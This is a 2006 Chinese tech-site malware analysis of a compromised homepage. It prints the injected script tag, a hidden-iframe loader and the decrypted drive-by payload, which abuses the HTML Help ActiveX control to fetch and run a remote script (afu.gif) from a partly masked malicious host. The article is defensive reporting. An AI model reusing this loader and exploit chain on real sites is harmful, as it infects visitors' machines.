又发现一个带毒网站(第2版)
来源: 作者:Purpleendurer 出处:综艺读书 2006-05-16endurer 原创
首页被插入代码:
<script language="javascript" src="http://www.***3core.com/images/gif.js">
|
|
|||
http://www.***3core.com/images/gif.js的代码为:
document.write("<iframe src=http://www.***3core.com/images/error.htm width=0 height=0></iframe>");
http://www.***3core.com/images/error.htm(Kaspersky报为Trojan-Downloader.JS.Agent.e)的内容为加密的脚本,解密后为:
<!--
var Words ="<script>document.write(unescape('<HTML>
<head>
</head>
<BODY>
<div style="display:none">
<OBJECT id="f1"
type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Window" value="$global_ifl">
<PARAM name="Item1" value='command;file://c:\WINDOWS\Help\apps.chm'>
</OBJECT>
<OBJECT id="f2" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Window" value="$global_ifl">
<PARAM name="Item1" value='command;javascript:eval("document.write(\"<SCRIPT language%20%3D%20JScript src=\\\"http://www.***3core.com/images/afu.gif\\\"\"+String.fromCharCode(62)+\"</SCR\"+\"IPT\"+String.fromCharCode(62))")'>
</OBJECT>
</div>
<script>
f1.Click();setTimeout("f2.Click();",0);
</script>
</BODY>
</HTML>'));</script>"
function OutWord()
{
var NewWords;
NewWords = unescape(Words);
document.write(NewWords);
}
OutWord();
// -->
这个error.htm的内容与
小心借情人节传播的QQ尾巴
中的afu.htm相似,同样是下载一个名为afu.gif的文件。
Kaspersky将afu.gif报为Exploit.VBS.Phel.bq
更多内容请看网站服务器的选型专题,或进入讨论组讨论。
相关图文阅读
频道图文推荐
相关专题
最新技术文档
·文件格式设计 10-25
·文件系统基础知识 10-16
·SVG问题精华(2) 10-11
·图象压缩的新革命:JPEG2000全面观察(3) 10-03
·图象压缩的新革命: JPEG2000相关制作工具 09-20
·右键发送到"桌面快捷方式"等没了的解决 05-16
·[J2ME]手机流媒体简单演示(StreamingDemo) 05-16
·外围防火墙规则+内部防火墙规则 05-16
·用rsync对网站进行镜像备份 05-16
·CCNA试验考试命令总结 05-16
·文件系统基础知识 10-16
·SVG问题精华(2) 10-11
·图象压缩的新革命:JPEG2000全面观察(3) 10-03
·图象压缩的新革命: JPEG2000相关制作工具 09-20
·右键发送到"桌面快捷方式"等没了的解决 05-16
·[J2ME]手机流媒体简单演示(StreamingDemo) 05-16
·外围防火墙规则+内部防火墙规则 05-16
·用rsync对网站进行镜像备份 05-16
·CCNA试验考试命令总结 05-16
站内各频道最新更新文档
站内最新制作专题
|
|||
| ·ACDSEE专题教程-下载使用 ·迅雷专题教程-下载使用 ·Windows XP频道 ·Windows Vista频道 ·Windows 2000频道 ·win2003频道 ·Freebsd频道 ·Oracle频道 |
·Linux频道 ·Windows频道 ·邮件服务器专题 ·协议大全 ·数据恢复指南教程 ·FreeBSD使用教程 ·Linux数据库宝典 ·Linux基础知识 |
||
热门关键字导读
站内频道文章精选
 新闻资讯 |
电脑技巧 |
| · 秘密:Vista隐蔽的动态屏保 · 腾讯开发新电子宠物--QQ熊 · 惠普否认2999元PC有价无货 |
· 驱逐Win系统“流氓”文件 · WinXP中获取未使用的IP地址 · 尝试format C:格式化硬盘? |
| 操作系统 |
常用软件 |
| · 在DOS下恢复回收站中的文件 · 拯救WinXP崩溃的救命稻草 · Linux系统中超级权限的应用 |
· 搜狗PK谷歌:谁能代言拼... · 昨日重现,一键GHOST轻松.. · 实现Web迅雷在空闲时杀毒 |
| 桌面开发 |
网络编程 |
| · AVIFile函数制做AVI文件 · VC中链接动态链接库的方法 · 熊猫烧香核心源码(Delphi) |
· DateDiff函数祥解 · JavaScript去除空格的三种 · js效果 图片加载进度实时.. |
| 数据库 |
图像处理 |
| · SQL Server数据库优化方案 · Oracle的初学者入门心得 · JSP连接Mysql数据库 |
· Photoshop为美女做艺术处理 · 用Freehand创建发光字特效 · 设计自己的个性QQ动态表情 |
百度推荐,商机无限
搜索您感兴趣的内容
